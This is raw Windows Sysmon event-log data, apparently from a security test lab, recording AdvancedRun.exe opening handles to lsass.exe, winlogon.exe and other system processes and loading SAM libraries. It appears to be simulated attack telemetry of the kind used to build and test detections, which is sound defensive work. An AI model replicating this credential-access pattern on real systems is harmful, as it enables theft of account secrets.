20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:06.618{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.017{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:05.004{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.012{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004068461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 
12241200x80000000000000004068460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004068457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.008{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.998{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft 
